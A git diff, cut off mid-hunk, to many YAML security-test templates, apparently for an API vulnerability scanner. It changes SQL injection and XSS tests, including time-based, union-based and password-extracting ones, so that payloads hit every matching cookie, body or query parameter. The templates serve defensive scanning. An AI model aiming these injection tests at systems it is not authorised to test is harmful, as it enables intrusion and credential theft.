extractMultiple: xsrfHeaderKey method: not_contains: diff --git a/Broken-User-Authentication/SQLInjectionCookieHeader.yml b/Broken-User-Authentication/SQLInjectionCookieHeader.yml index b0ee978ff..cf9414481 100644 --- a/Broken-User-Authentication/SQLInjectionCookieHeader.yml +++ b/Broken-User-Authentication/SQLInjectionCookieHeader.yml @@ -74,7 +74,7 @@ api_selection_filters: for_one: key: regex: "^Cookie$|^cookie$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -92,8 +92,9 @@ execute: requests: - req: - modify_header: - userKey: ${userVal}${cookieHeaderPayloads} + ${userKey}: ${userVal}${cookieHeaderPayloads} + for_each_combination: true validate: or: - response_payload: diff --git a/Broken-User-Authentication/SQLiErrorBasedParamAppendPayloadMSSQL.yml b/Broken-User-Authentication/SQLiErrorBasedParamAppendPayloadMSSQL.yml index 5cf2d8e65..bb9ac25c8 100644 --- a/Broken-User-Authentication/SQLiErrorBasedParamAppendPayloadMSSQL.yml +++ b/Broken-User-Authentication/SQLiErrorBasedParamAppendPayloadMSSQL.yml @@ -47,14 +47,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -72,9 +72,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${changed_body_value}${specialCharacters} + ${changed_body_key}: ${changed_body_value}${specialCharacters} + for_each_combination: true - modify_query_param: - changed_query_key: ${changed_query_value}${specialCharacters} + ${changed_query_key}: ${changed_query_value}${specialCharacters} + for_each_combination: true validate: and: - response_payload: diff --git a/Broken-User-Authentication/SQLiErrorBasedParamAppendPayloadOracle.yml b/Broken-User-Authentication/SQLiErrorBasedParamAppendPayloadOracle.yml index 23daf7550..dd6fcd8ef 100644 --- a/Broken-User-Authentication/SQLiErrorBasedParamAppendPayloadOracle.yml +++ b/Broken-User-Authentication/SQLiErrorBasedParamAppendPayloadOracle.yml @@ -47,14 +47,14 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -72,9 +72,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${changed_body_value}${specialCharacters} + ${changed_body_key}: ${changed_body_value}${specialCharacters} + for_each_combination: true - modify_query_param: - changed_query_key: ${changed_query_value}${specialCharacters} + ${changed_query_key}: ${changed_query_value}${specialCharacters} + for_each_combination: true validate: and: - response_payload: diff --git a/Broken-User-Authentication/SQLiErrorBasedParamMSSQL.yml b/Broken-User-Authentication/SQLiErrorBasedParamMSSQL.yml index c273b96be..e64c46463 100644 --- a/Broken-User-Authentication/SQLiErrorBasedParamMSSQL.yml +++ b/Broken-User-Authentication/SQLiErrorBasedParamMSSQL.yml @@ -47,12 +47,12 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key wordLists: specialCharacters: - "'" @@ -67,9 +67,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialCharacters} + ${changed_body_key}: ${specialCharacters} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialCharacters} + ${changed_query_key}: ${specialCharacters} + for_each_combination: true validate: and: - response_payload: diff --git a/Broken-User-Authentication/SQLiErrorBasedParamSQLite.yml b/Broken-User-Authentication/SQLiErrorBasedParamSQLite.yml index 830211780..837a35fc5 100644 --- a/Broken-User-Authentication/SQLiErrorBasedParamSQLite.yml +++ b/Broken-User-Authentication/SQLiErrorBasedParamSQLite.yml @@ -47,12 +47,12 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key wordLists: specialCharacters: - "'" @@ -67,9 +67,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${specialCharacters} + ${changed_body_key}: ${specialCharacters} + for_each_combination: true - modify_query_param: - changed_query_key: ${specialCharacters} + ${changed_query_key}: ${specialCharacters} + for_each_combination: true validate: and: - response_payload: diff --git a/Broken-User-Authentication/SecondOrderSQLiXSS.yml b/Broken-User-Authentication/SecondOrderSQLiXSS.yml index 34bbf7319..aa4176e84 100644 --- a/Broken-User-Authentication/SecondOrderSQLiXSS.yml +++ b/Broken-User-Authentication/SecondOrderSQLiXSS.yml @@ -73,7 +73,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -92,7 +92,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${secondOrderXSSPayloads} + ${userKey}: ${userVal}${secondOrderXSSPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -141,7 +142,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${secondOrderXSSNegativePayloads} + ${userKey}: ${secondOrderXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -190,7 +192,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${secondOrderXSSNegativePayloads} + ${userKey}: ${secondOrderXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/SecondOrderSQLiXSSGET.yml b/Broken-User-Authentication/SecondOrderSQLiXSSGET.yml index 6606bf1c8..d4e3beaf6 100644 --- a/Broken-User-Authentication/SecondOrderSQLiXSSGET.yml +++ b/Broken-User-Authentication/SecondOrderSQLiXSSGET.yml @@ -73,7 +73,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -92,7 +92,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${userVal}${secondOrderXSSPayloads} + ${userKey}: ${userVal}${secondOrderXSSPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -141,7 +142,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${secondOrderXSSNegativePayloads} + ${userKey}: ${secondOrderXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -190,7 +192,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${secondOrderXSSNegativePayloads} + ${userKey}: ${secondOrderXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/StoredSQLiXSS.yml b/Broken-User-Authentication/StoredSQLiXSS.yml index 0f25c16a7..15d8e4772 100644 --- a/Broken-User-Authentication/StoredSQLiXSS.yml +++ b/Broken-User-Authentication/StoredSQLiXSS.yml @@ -73,7 +73,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -96,7 +96,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${storedXSSPayloads} + ${userKey}: ${userVal}${storedXSSPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -146,7 +147,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${storedXSSNegativePayloads} + ${userKey}: ${storedXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -198,7 +200,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${storedXSSNegativePayloads} + ${userKey}: ${storedXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/StoredSQLiXSSGET.yml b/Broken-User-Authentication/StoredSQLiXSSGET.yml index 725a08e99..e61d3388f 100644 --- a/Broken-User-Authentication/StoredSQLiXSSGET.yml +++ b/Broken-User-Authentication/StoredSQLiXSSGET.yml @@ -73,7 +73,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -96,7 +96,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${userVal}${storedXSSPayloads} + ${userKey}: ${userVal}${storedXSSPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -146,7 +147,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${storedXSSNegativePayloads} + ${userKey}: ${storedXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -198,7 +200,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${storedXSSNegativePayloads} + ${userKey}: ${storedXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/TimeBasedMySQLi.yml b/Broken-User-Authentication/TimeBasedMySQLi.yml index e357ae153..bc0d2bcd7 100644 --- a/Broken-User-Authentication/TimeBasedMySQLi.yml +++ b/Broken-User-Authentication/TimeBasedMySQLi.yml @@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -137,7 +137,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${timeBasedPayloads} + ${userKey}: ${userVal}${timeBasedPayloads} + for_each_combination: true - validate: response_code: eq: 429 diff --git a/Broken-User-Authentication/TimeBasedMySQLiPOST.yml b/Broken-User-Authentication/TimeBasedMySQLiPOST.yml index 0e835e96f..46f33ac1a 100644 --- a/Broken-User-Authentication/TimeBasedMySQLiPOST.yml +++ b/Broken-User-Authentication/TimeBasedMySQLiPOST.yml @@ -71,7 +71,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -128,7 +128,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${timeBasedPayloads} + ${userKey}: ${userVal}${timeBasedPayloads} + for_each_combination: true - validate: response_code: eq: 429 diff --git a/Broken-User-Authentication/TimeBasedPostgreSQLi.yml b/Broken-User-Authentication/TimeBasedPostgreSQLi.yml index 93c47f24f..aaa6b8a05 100644 --- a/Broken-User-Authentication/TimeBasedPostgreSQLi.yml +++ b/Broken-User-Authentication/TimeBasedPostgreSQLi.yml @@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -137,7 +137,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${timeBasedPayloads} + ${userKey}: ${userVal}${timeBasedPayloads} + for_each_combination: true - validate: response_code: eq: 429 diff --git a/Broken-User-Authentication/TimeBasedPostgreSQLiGET.yml b/Broken-User-Authentication/TimeBasedPostgreSQLiGET.yml index cfb7ef412..181cc7f62 100644 --- a/Broken-User-Authentication/TimeBasedPostgreSQLiGET.yml +++ b/Broken-User-Authentication/TimeBasedPostgreSQLiGET.yml @@ -71,7 +71,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -130,7 +130,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${timeBasedPayloads} + ${userKey}: ${userVal}${timeBasedPayloads} + for_each_combination: true - validate: response_code: eq: 429 diff --git a/Broken-User-Authentication/TimeBasedSQLiSQLiteDB.yml b/Broken-User-Authentication/TimeBasedSQLiSQLiteDB.yml index 3295c56a3..bd2ce329f 100644 --- a/Broken-User-Authentication/TimeBasedSQLiSQLiteDB.yml +++ b/Broken-User-Authentication/TimeBasedSQLiSQLiteDB.yml @@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -137,7 +137,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${timeBasedPayloads} + ${userKey}: ${userVal}${timeBasedPayloads} + for_each_combination: true - validate: response_code: eq: 429 diff --git a/Broken-User-Authentication/TimeBasedSQLiSQLiteDBPOST.yml b/Broken-User-Authentication/TimeBasedSQLiSQLiteDBPOST.yml index 367164f60..71b5c9eea 100644 --- a/Broken-User-Authentication/TimeBasedSQLiSQLiteDBPOST.yml +++ b/Broken-User-Authentication/TimeBasedSQLiSQLiteDBPOST.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -129,7 +129,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${timeBasedPayloads} + ${userKey}: ${userVal}${timeBasedPayloads} + for_each_combination: true - validate: response_code: eq: 429 diff --git a/Broken-User-Authentication/TimeBasedSQLiXSSGET.yml b/Broken-User-Authentication/TimeBasedSQLiXSSGET.yml index 13d2125a4..5b95a15f2 100644 --- a/Broken-User-Authentication/TimeBasedSQLiXSSGET.yml +++ b/Broken-User-Authentication/TimeBasedSQLiXSSGET.yml @@ -71,7 +71,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -131,7 +131,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${timeBasedPayloads} + ${userKey}: ${userVal}${timeBasedPayloads} + for_each_combination: true - validate: response_code: eq: 429 diff --git a/Broken-User-Authentication/TimeBasedSQLiwithXSS.yml b/Broken-User-Authentication/TimeBasedSQLiwithXSS.yml index ecaa33c66..b226d11ac 100644 --- a/Broken-User-Authentication/TimeBasedSQLiwithXSS.yml +++ b/Broken-User-Authentication/TimeBasedSQLiwithXSS.yml @@ -79,7 +79,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -139,7 +139,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${timeBasedPayloads} + ${userKey}: ${userVal}${timeBasedPayloads} + for_each_combination: true - validate: response_code: eq: 429 diff --git a/Broken-User-Authentication/TimeBasedSQLiwithXSSPOST.yml b/Broken-User-Authentication/TimeBasedSQLiwithXSSPOST.yml index 26256ecd4..1e1f9420d 100644 --- a/Broken-User-Authentication/TimeBasedSQLiwithXSSPOST.yml +++ b/Broken-User-Authentication/TimeBasedSQLiwithXSSPOST.yml @@ -71,7 +71,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -131,7 +131,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${timeBasedPayloads} + ${userKey}: ${userVal}${timeBasedPayloads} + for_each_combination: true - validate: response_code: eq: 429 diff --git a/Broken-User-Authentication/UnionBasedMySQLiEnforceCommentPOST.yml b/Broken-User-Authentication/UnionBasedMySQLiEnforceCommentPOST.yml index 9f776c8b0..6d3482df7 100644 --- a/Broken-User-Authentication/UnionBasedMySQLiEnforceCommentPOST.yml +++ b/Broken-User-Authentication/UnionBasedMySQLiEnforceCommentPOST.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -103,7 +103,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -154,7 +155,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${unionBasedNegativePayloads} + ${userKey}: ${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -206,7 +208,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${unionBasedNegativePayloads} + ${userKey}: ${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionBasedMySQLiEnforcingCommentPayloadOnLoginEndpoint.yml b/Broken-User-Authentication/UnionBasedMySQLiEnforcingCommentPayloadOnLoginEndpoint.yml index 82fc16582..7b65c156a 100644 --- a/Broken-User-Authentication/UnionBasedMySQLiEnforcingCommentPayloadOnLoginEndpoint.yml +++ b/Broken-User-Authentication/UnionBasedMySQLiEnforcingCommentPayloadOnLoginEndpoint.yml @@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -111,7 +111,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -162,7 +163,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${unionBasedNegativePayloads} + ${userKey}: ${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -214,7 +216,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${unionBasedNegativePayloads} + ${userKey}: ${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionBasedMySQLiSubQueryExtractPasswordPayloadOnLoginEndpoint.yml b/Broken-User-Authentication/UnionBasedMySQLiSubQueryExtractPasswordPayloadOnLoginEndpoint.yml index add94b536..84488face 100644 --- a/Broken-User-Authentication/UnionBasedMySQLiSubQueryExtractPasswordPayloadOnLoginEndpoint.yml +++ b/Broken-User-Authentication/UnionBasedMySQLiSubQueryExtractPasswordPayloadOnLoginEndpoint.yml @@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -112,7 +112,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -158,7 +159,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -205,7 +207,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionBasedMySQLiSubQueryExtractUsernamePayloadOnLoginEndpoint.yml b/Broken-User-Authentication/UnionBasedMySQLiSubQueryExtractUsernamePayloadOnLoginEndpoint.yml index acb95a0a8..66ecb7740 100644 --- a/Broken-User-Authentication/UnionBasedMySQLiSubQueryExtractUsernamePayloadOnLoginEndpoint.yml +++ b/Broken-User-Authentication/UnionBasedMySQLiSubQueryExtractUsernamePayloadOnLoginEndpoint.yml @@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -112,7 +112,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -158,7 +159,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -205,7 +207,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionBasedMySQLiSubqueryExtractPasswordPayloadGET.yml b/Broken-User-Authentication/UnionBasedMySQLiSubqueryExtractPasswordPayloadGET.yml index 4764cb9e4..aad8984cf 100644 --- a/Broken-User-Authentication/UnionBasedMySQLiSubqueryExtractPasswordPayloadGET.yml +++ b/Broken-User-Authentication/UnionBasedMySQLiSubqueryExtractPasswordPayloadGET.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -104,7 +104,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -150,7 +151,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -197,7 +199,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionBasedMySQLiSubqueryExtractPasswordPayloadPOST.yml b/Broken-User-Authentication/UnionBasedMySQLiSubqueryExtractPasswordPayloadPOST.yml index fe68acbfc..d05e634d1 100644 --- a/Broken-User-Authentication/UnionBasedMySQLiSubqueryExtractPasswordPayloadPOST.yml +++ b/Broken-User-Authentication/UnionBasedMySQLiSubqueryExtractPasswordPayloadPOST.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -104,7 +104,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -150,7 +151,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -197,7 +199,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionBasedMySQLiSubqueryExtractUsernamePayloadPOST.yml b/Broken-User-Authentication/UnionBasedMySQLiSubqueryExtractUsernamePayloadPOST.yml index 852593fb5..01d0f1d45 100644 --- a/Broken-User-Authentication/UnionBasedMySQLiSubqueryExtractUsernamePayloadPOST.yml +++ b/Broken-User-Authentication/UnionBasedMySQLiSubqueryExtractUsernamePayloadPOST.yml @@ -71,7 +71,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -103,7 +103,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -149,7 +150,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -196,7 +198,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionBasedMySQLiWithURLEncodedPayloadsLoginEndpoint.yml b/Broken-User-Authentication/UnionBasedMySQLiWithURLEncodedPayloadsLoginEndpoint.yml index a9890fd56..8c592302f 100644 --- a/Broken-User-Authentication/UnionBasedMySQLiWithURLEncodedPayloadsLoginEndpoint.yml +++ b/Broken-User-Authentication/UnionBasedMySQLiWithURLEncodedPayloadsLoginEndpoint.yml @@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -113,7 +113,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -159,7 +160,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -207,7 +209,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionBasedMySQLiWithURLEncodedPayloadsPOST.yml b/Broken-User-Authentication/UnionBasedMySQLiWithURLEncodedPayloadsPOST.yml index ea896825d..b66ba3890 100644 --- a/Broken-User-Authentication/UnionBasedMySQLiWithURLEncodedPayloadsPOST.yml +++ b/Broken-User-Authentication/UnionBasedMySQLiWithURLEncodedPayloadsPOST.yml @@ -71,7 +71,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -102,7 +102,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -148,7 +149,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -196,7 +198,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionBasedMySQLiWithUrlEncodedPayloadsGET.yml b/Broken-User-Authentication/UnionBasedMySQLiWithUrlEncodedPayloadsGET.yml index 1997fe238..bece47a41 100644 --- a/Broken-User-Authentication/UnionBasedMySQLiWithUrlEncodedPayloadsGET.yml +++ b/Broken-User-Authentication/UnionBasedMySQLiWithUrlEncodedPayloadsGET.yml @@ -71,7 +71,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -104,7 +104,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -150,7 +151,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: 